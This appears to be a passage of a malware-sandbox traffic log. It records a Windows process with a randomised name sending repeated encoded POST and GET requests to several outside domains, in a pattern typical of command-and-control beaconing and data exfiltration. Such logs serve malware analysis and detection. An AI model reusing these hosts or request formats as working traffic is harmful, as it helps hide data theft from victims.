                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.nutrigenfit.online
                                                                                                                                          Referer: http://www.nutrigenfit.online/2vhi/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 6b 30 75 34 79 6a 2b 30 6c 4f 69 72 72 2f 65 55 65 71 51 58 6b 70 53 63 2b 53 4a 2f 56 47 61 6f 47 35 56 38 35 57 61 75 66 30 52 42 4c 4a 4d 76 65 45 69 6a 65 72 33 42 31 32 62 30 50 73 71 55 74 65 30 75 6d 6b 73 68 36 2b 6d 4f 52 5a 50 4c 6f 71 64 73 36 6c 58 2f 36 42 65 57 67 70 4c 4b 36 55 39 66 76 74 50 33 31 54 75 6a 47 55 59 63 63 33 36 54 76 32 46 36 41 6c 53 4d 54 6b 38 56 41 49 66 66 54 2b 32 4e 49 37 45 30 41 33 45 64 55 36 64 42 67 44 4f 68 2b 43 4a 73 68 64 51 69 6f 70 78 76 68 47 5a 39 78 78 59 53 72 43 30 51 75 59 5a 74 64 57 31 4d 77 73 6f 44 6c 70 68 44 59 32 6f 72 51 4d 48 74 7a 79 76 62 4d 71 78 44 30 4f 41 41 70 45 67 3d
                                                                                                                                          Data Ascii: n8C0=k0u4yj+0lOirr/eUeqQXkpSc+SJ/VGaoG5V85Wauf0RBLJMveEijer3B12b0PsqUte0umksh6+mORZPLoqds6lX/6BeWgpLK6U9fvtP31TujGUYcc36Tv2F6AlSMTk8VAIffT+2NI7E0A3EdU6dBgDOh+CJshdQiopxvhGZ9xxYSrC0QuYZtdW1MwsoDlphDY2orQMHtzyvbMqxD0OAApEg=
                                                                                                                                          Nov 14, 2024 16:30:44.844105005 CET367INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:44 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 203
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          43192.168.2.450045195.110.124.13380928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:46.527024031 CET10790OUTPOST /2vhi/ HTTP/1.1
                                                                                                                                          Host: www.nutrigenfit.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.nutrigenfit.online
                                                                                                                                          Referer: http://www.nutrigenfit.online/2vhi/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 6b 30 75 34 79 6a 2b 30 6c 4f 69 72 72 2f 65 55 65 71 51 58 6b 70 53 63 2b 53 4a 2f 56 47 61 6f 47 35 56 38 35 57 61 75 66 30 4a 42 4c 59 73 76 63 6a 2b 6a 64 72 33 42 38 57 62 78 50 73 72 47 74 66 64 6e 6d 6c 51 58 36 38 65 4f 52 2b 6e 4c 2f 72 64 73 7a 6c 58 2f 7a 68 65 54 6b 70 4b 49 36 51 5a 62 76 70 54 33 31 54 75 6a 47 57 41 63 63 6c 43 54 74 32 46 31 4a 46 53 70 58 6b 39 4b 41 4f 32 39 54 34 72 32 4c 4c 6b 30 41 58 55 64 57 6f 31 42 39 7a 4f 6a 37 43 4a 4b 68 63 74 38 6f 74 52 56 68 46 46 54 78 79 45 53 72 47 74 45 32 34 46 49 49 47 64 49 69 71 67 7a 70 71 31 44 65 45 59 72 57 50 62 50 73 79 2f 32 57 4c 55 54 67 2b 6c 47 71 67 5a 6d 73 4c 31 68 5a 67 6b 4c 4a 67 41 61 37 4b 76 74 77 33 58 65 6c 50 78 35 6d 57 70 6b 65 55 41 48 7a 57 67 4b 35 4f 6f 5a 37 6a 4b 69 71 4e 79 49 65 6c 41 79 63 4a 74 65 2f 78 64 38 70 38 39 45 41 70 43 62 72 46 4b 4e 79 79 54 30 34 41 77 44 63 6c 75 39 6a 6c 50 41 5a 59 6b 54 32 48 4e 34 50 4b 43 77 4b 72 34 68 4b 76 37 7a 68 59 64 31 32 6d 46 4c 62 [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=k0u4yj+0lOirr/eUeqQXkpSc+SJ/VGaoG5V85Wauf0JBLYsvcj+jdr3B8WbxPsrGtfdnmlQX68eOR+nL/rdszlX/zheTkpKI6QZbvpT31TujGWAcclCTt2F1JFSpXk9KAO29T4r2LLk0AXUdWo1B9zOj7CJKhct8otRVhFFTxyESrGtE24FIIGdIiqgzpq1DeEYrWPbPsy/2WLUTg+lGqgZmsL1hZgkLJgAa7Kvtw3XelPx5mWpkeUAHzWgK5OoZ7jKiqNyIelAycJte/xd8p89EApCbrFKNyyT04AwDclu9jlPAZYkT2HN4PKCwKr4hKv7zhYd12mFLb6E1yT/24JnXigZ62Na1g43tCivqm6/qU6sxsnGzr+/y2ZEc5oOhxQlgbQ+pR5nLUiU8V6cATJ7mZK7Dcu5kdgh8AYjWnRmsYUbENPJRB52oH7mVpSiL6cgFt3WCoGdyvNiEdDYkjiQg0IrpoIVGxVJcj8XEQ70w09FDNEC2DU3gwnrkF9kRFeqYuXKwlrQUBhONNEcD3ql5zywk64HMqbqk7nrUy8o1pV02GsX0s9urLVXb+XS2wrPoK+1Z0yS8m+/JNCAMdQ90T8zUnYqD6H1qQuAFuvONUHa+vq0sY7EkJlMEWU/s0qMucDI1GUsMgmrOerTy0bA5o0YrftPGEeBAR8VnO+2wqeGQVcoxWbDyuVQBpDfEUuhsHA/02k6DOJJkMfceunZYMXnx0MTOmU2sFf2mOuZiVmOVLz85cNSUJjzlNA5lQeoq+MDHSIOX4BpS7NNYynzz+sP3gCVx4Tld2wU/6t/9KZKugJznD7+luCk73bBhd182lGn38c5mCWTMdImiand7C1FT3zDJJ/QFxswo1xlErmdtTWbwiC5s5jq53IrnWk0uL9ves6UzwjzxF7DOVx9D9YQ5xeF19v5uguQxikz/BLTlxuN67wEQqGI75BFjgW627fd9hu87C+BLoUDcgjqvPJZcpgceQ4CQ/J/zjJXsdWv [TRUNCATED]
                                                                                                                                          Nov 14, 2024 16:30:47.376981020 CET367INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:47 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 203
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          44192.168.2.450046195.110.124.13380928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:49.069375038 CET417OUTGET /2vhi/?n8C0=p2GYxSiN0s6gm9KFXJAq4e6x0wIcQGHvIu1Z7lHSXEw8LLsTZRCMFJnl6mHAS53RhcMtrCoh89iRZIjWsbRt6wLU8XSetM7dmQ1c462L7iOcXWx8c3Lg+VA=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.nutrigenfit.online
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:30:49.912000895 CET367INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Thu, 14 Nov 2024 15:30:49 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Content-Length: 203
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 32 76 68 69 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /2vhi/ was not found on this server.</p></body></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          45192.168.2.4500473.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:55.091777086 CET682OUTPOST /v22a/ HTTP/1.1
                                                                                                                                          Host: www.binacamasala.com
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.binacamasala.com
                                                                                                                                          Referer: http://www.binacamasala.com/v22a/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 4a 41 58 67 34 62 6d 31 59 38 49 6b 61 41 79 75 4f 45 4d 32 64 58 47 72 55 39 4e 70 68 6b 36 32 57 49 4c 68 48 38 53 31 31 32 4c 58 71 49 57 5a 2b 2b 66 68 4e 4a 49 30 55 56 5a 66 6f 56 67 6c 6a 55 45 58 53 72 35 46 46 35 5a 37 7a 31 49 68 2f 2f 65 44 32 4c 68 66 46 41 53 4e 73 6f 66 4c 38 4d 35 50 69 44 77 5a 34 4c 38 6e 49 61 52 73 53 66 43 49 71 71 66 6a 6a 52 73 2f 67 73 52 76 39 4f 32 72 74 35 63 4e 35 30 49 4c 54 36 70 37 39 63 47 76 39 48 4e 51 34 49 33 63 31 4d 34 69 30 6d 69 34 49 62 6b 64 61 4c 74 6b 74 33 38 6b 52 41 63 52 4f 38 78 73 2f 73 4c 36 33 6b 57 57 6e 77 3d 3d
                                                                                                                                          Data Ascii: n8C0=JAXg4bm1Y8IkaAyuOEM2dXGrU9Nphk62WILhH8S112LXqIWZ++fhNJI0UVZfoVgljUEXSr5FF5Z7z1Ih//eD2LhfFASNsofL8M5PiDwZ4L8nIaRsSfCIqqfjjRs/gsRv9O2rt5cN50ILT6p79cGv9HNQ4I3c1M4i0mi4IbkdaLtkt38kRAcRO8xs/sL63kWWnw==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          46192.168.2.4500483.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:30:57.636802912 CET702OUTPOST /v22a/ HTTP/1.1
                                                                                                                                          Host: www.binacamasala.com
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.binacamasala.com
                                                                                                                                          Referer: http://www.binacamasala.com/v22a/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 4a 41 58 67 34 62 6d 31 59 38 49 6b 62 67 69 75 44 44 34 32 52 6e 47 71 61 64 4e 70 6f 45 37 65 57 49 48 68 48 2b 2f 77 30 46 76 58 70 6f 6d 5a 2f 36 72 68 65 35 49 30 63 31 59 56 6d 31 67 79 6a 55 49 68 53 75 42 46 46 35 4e 37 7a 77 73 68 2b 4d 32 41 33 62 68 64 63 77 53 50 68 49 66 4c 38 4d 35 50 69 44 6c 45 34 4c 30 6e 49 71 68 73 41 72 58 36 70 71 66 67 6b 52 73 2f 6b 73 52 52 39 4f 33 52 74 34 42 67 35 78 55 4c 54 34 78 37 39 76 65 6f 33 48 4e 4a 31 6f 32 2f 6c 65 4d 6f 39 6e 47 73 48 70 45 65 62 36 46 4a 6f 78 78 2b 41 78 39 47 63 38 56 66 69 72 43 4f 36 6e 72 66 38 30 32 42 4d 78 47 48 54 32 53 4e 48 65 30 66 51 65 68 31 32 6f 6b 3d
                                                                                                                                          Data Ascii: n8C0=JAXg4bm1Y8IkbgiuDD42RnGqadNpoE7eWIHhH+/w0FvXpomZ/6rhe5I0c1YVm1gyjUIhSuBFF5N7zwsh+M2A3bhdcwSPhIfL8M5PiDlE4L0nIqhsArX6pqfgkRs/ksRR9O3Rt4Bg5xULT4x79veo3HNJ1o2/leMo9nGsHpEeb6FJoxx+Ax9Gc8VfirCO6nrf802BMxGHT2SNHe0fQeh12ok=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          47192.168.2.4500493.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:00.188041925 CET10784OUTPOST /v22a/ HTTP/1.1
                                                                                                                                          Host: www.binacamasala.com
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.binacamasala.com
                                                                                                                                          Referer: http://www.binacamasala.com/v22a/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 10301
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 4a 41 58 67 34 62 6d 31 59 38 49 6b 62 67 69 75 44 44 34 32 52 6e 47 71 61 64 4e 70 6f 45 37 65 57 49 48 68 48 2b 2f 77 30 46 6e 58 70 5a 47 5a 2f 64 33 68 64 35 49 30 57 56 59 59 6d 31 67 7a 6a 56 68 6f 53 75 63 36 46 36 31 37 70 53 6b 68 35 39 32 41 39 62 68 64 55 51 53 4d 73 6f 65 57 38 4d 70 4c 69 44 31 45 34 4c 30 6e 49 70 35 73 44 2f 44 36 6c 4b 66 6a 6a 52 73 4a 67 73 51 38 39 50 54 72 74 34 45 64 35 43 4d 4c 51 62 4a 37 75 4e 47 6f 37 48 4e 4c 77 6f 32 5a 6c 65 52 79 39 6e 62 43 48 74 4e 37 62 35 5a 4a 6b 58 63 63 48 42 35 46 66 66 46 36 35 61 71 77 6a 32 33 41 36 55 61 34 42 45 6e 63 45 48 75 6a 4c 64 67 62 41 4d 55 77 6f 39 38 65 35 4b 62 37 4b 47 4b 48 5a 35 69 6d 34 31 56 4b 48 74 57 30 44 44 4f 79 52 65 39 30 6c 6d 7a 44 54 6a 71 69 70 2b 6d 58 55 72 76 35 44 6a 4b 33 34 77 42 77 38 44 66 32 46 58 72 70 6d 49 37 5a 77 6e 53 49 66 55 32 71 68 35 33 2f 75 6c 4a 36 61 4d 6f 46 59 70 47 4d 51 4a 39 48 74 7a 5a 62 79 53 6a 73 45 38 73 37 48 73 54 46 2b 50 56 52 50 57 4d 48 6b [TRUNCATED]
                                                                                                                                          Data Ascii: n8C0=JAXg4bm1Y8IkbgiuDD42RnGqadNpoE7eWIHhH+/w0FnXpZGZ/d3hd5I0WVYYm1gzjVhoSuc6F617pSkh592A9bhdUQSMsoeW8MpLiD1E4L0nIp5sD/D6lKfjjRsJgsQ89PTrt4Ed5CMLQbJ7uNGo7HNLwo2ZleRy9nbCHtN7b5ZJkXccHB5FffF65aqwj23A6Ua4BEncEHujLdgbAMUwo98e5Kb7KGKHZ5im41VKHtW0DDOyRe90lmzDTjqip+mXUrv5DjK34wBw8Df2FXrpmI7ZwnSIfU2qh53/ulJ6aMoFYpGMQJ9HtzZbySjsE8s7HsTF+PVRPWMHk5MZpJXCHllINUDLwm+iSPwuKODOH6+PELtfb+vvPrPepo1RT+4hRVD76klN23LbI0/0j0cP/QT/N7IYCcUK/TjJP3JwW9yta1gZsv6VkhNFWznwBqYRWHsVXiHEkcojXioPPToUV6LEzhfmWhznWzJDUUMsGvOhD6oxPyf/CcVdIliBL6r2rNgckHPELiaOZc2JFllSPt/9h8bEv7xzkkG1MUXRpD/SWCHFJcD/X8+BgHpyLFI+vmeAmy4XXyDv1S6QRs90nm4cWDNS0bFsgLsHv6eV/61uKKzVIs9ISw56vSznSrhDYqByR+QS3RXqn5ot+cX9iaPuM559YW/gu5DfmFR+mtTHTnhyD/8ONcsnpuWlUMNTp8p09ER9JxDC+K/EqSTlz/W9uQJBjqz7E9xSaMuJVKZLd7rnfKLAqhlys6bRtSBdQDKMrGTFUxPgvkwt5GHWuoQZQivw90JIk3mHl5XcdLIQXjjPDahQ/7oqkJIhuVDVe4oYUfKLgE4mWs9RMVfOX3hNq3/aNA6lD01Xx9R8z4R03vEZEkfCBOOaVuSFKNMzN4X+DGeiIgCjhVi5kHE76ajyfdj8lOpOJAQ4aOf5RgJzNJ2RZ+RuJj15pjCd++OlGPy10xc29yoyLMH3dhpnrynA5qojl+6AVLSi4dSsm68qiWC [TRUNCATED]


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          48192.168.2.4500503.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:02.723759890 CET415OUTGET /v22a/?n8C0=EC/A7teyBMYlbVKyOV0wXHPUQ8wRlnuqVuKyKuaI0UjQwLqiy/LDdaUNTXEK/kNNzWxpb7ooCK98wisCyuuE2vBpSiPYpNjY/fBMlzxK1ow9Vo9FDMHmtIo=&vva=cTUXfXqHQ4cd-Hh0 HTTP/1.1
                                                                                                                                          Host: www.binacamasala.com
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Connection: close
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Nov 14, 2024 16:31:03.344474077 CET401INHTTP/1.1 200 OK
                                                                                                                                          Server: openresty
                                                                                                                                          Date: Thu, 14 Nov 2024 15:31:03 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Content-Length: 261
                                                                                                                                          Connection: close
                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6e 38 43 30 3d 45 43 2f 41 37 74 65 79 42 4d 59 6c 62 56 4b 79 4f 56 30 77 58 48 50 55 51 38 77 52 6c 6e 75 71 56 75 4b 79 4b 75 61 49 30 55 6a 51 77 4c 71 69 79 2f 4c 44 64 61 55 4e 54 58 45 4b 2f 6b 4e 4e 7a 57 78 70 62 37 6f 6f 43 4b 39 38 77 69 73 43 79 75 75 45 32 76 42 70 53 69 50 59 70 4e 6a 59 2f 66 42 4d 6c 7a 78 4b 31 6f 77 39 56 6f 39 46 44 4d 48 6d 74 49 6f 3d 26 76 76 61 3d 63 54 55 58 66 58 71 48 51 34 63 64 2d 48 68 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?n8C0=EC/A7teyBMYlbVKyOV0wXHPUQ8wRlnuqVuKyKuaI0UjQwLqiy/LDdaUNTXEK/kNNzWxpb7ooCK98wisCyuuE2vBpSiPYpNjY/fBMlzxK1ow9Vo9FDMHmtIo=&vva=cTUXfXqHQ4cd-Hh0"}</script></head></html>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          49192.168.2.4500513.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:16.499958992 CET676OUTPOST /37zt/ HTTP/1.1
                                                                                                                                          Host: www.robotcurut.xyz
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.robotcurut.xyz
                                                                                                                                          Referer: http://www.robotcurut.xyz/37zt/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 201
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                                                          Data Raw: 6e 38 43 30 3d 6f 34 4c 30 32 56 34 59 38 69 43 6b 63 42 63 4f 54 6f 6d 6e 2b 5a 56 73 35 75 36 4d 30 4d 31 5a 79 63 5a 68 6b 7a 45 69 7a 42 51 4d 32 41 47 51 59 6c 77 4b 79 59 2b 50 32 75 69 71 4d 51 4f 71 38 39 2b 6a 73 37 31 78 39 55 36 45 4b 6a 4c 36 37 6f 4f 4b 73 31 48 32 75 6a 62 41 57 4d 59 6e 6c 4a 4a 66 41 65 34 6f 70 70 6e 67 31 5a 55 6a 4d 71 73 4f 50 65 72 4a 71 54 4d 53 36 39 6d 53 78 47 57 5a 68 5a 77 34 4f 4e 47 34 59 79 44 59 36 59 43 68 62 4d 2b 69 34 77 53 53 41 47 49 2b 30 56 70 43 30 55 55 65 30 64 75 6c 67 39 61 65 36 6b 43 72 4d 66 74 64 44 55 43 61 6e 51 74 6e 30 67 3d 3d
                                                                                                                                          Data Ascii: n8C0=o4L02V4Y8iCkcBcOTomn+ZVs5u6M0M1ZycZhkzEizBQM2AGQYlwKyY+P2uiqMQOq89+js71x9U6EKjL67oOKs1H2ujbAWMYnlJJfAe4oppng1ZUjMqsOPerJqTMS69mSxGWZhZw4ONG4YyDY6YChbM+i4wSSAGI+0VpC0UUe0dulg9ae6kCrMftdDUCanQtn0g==


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          50192.168.2.4500523.33.130.19080928C:\Program Files (x86)\bJhdQzQITvPPZoAFXXSnRwDidlocuZYKQmISmXrXzcUGaysRqoLveuRscdclDFMo\pQIuyzclQg.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Nov 14, 2024 16:31:19.048754930 CET696OUTPOST /37zt/ HTTP/1.1
                                                                                                                                          Host: www.robotcurut.xyz
                                                                                                                                          Accept: */*
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Origin: http://www.robotcurut.xyz
                                                                                                                                          Referer: http://www.robotcurut.xyz/37zt/
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Content-Length: 221
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
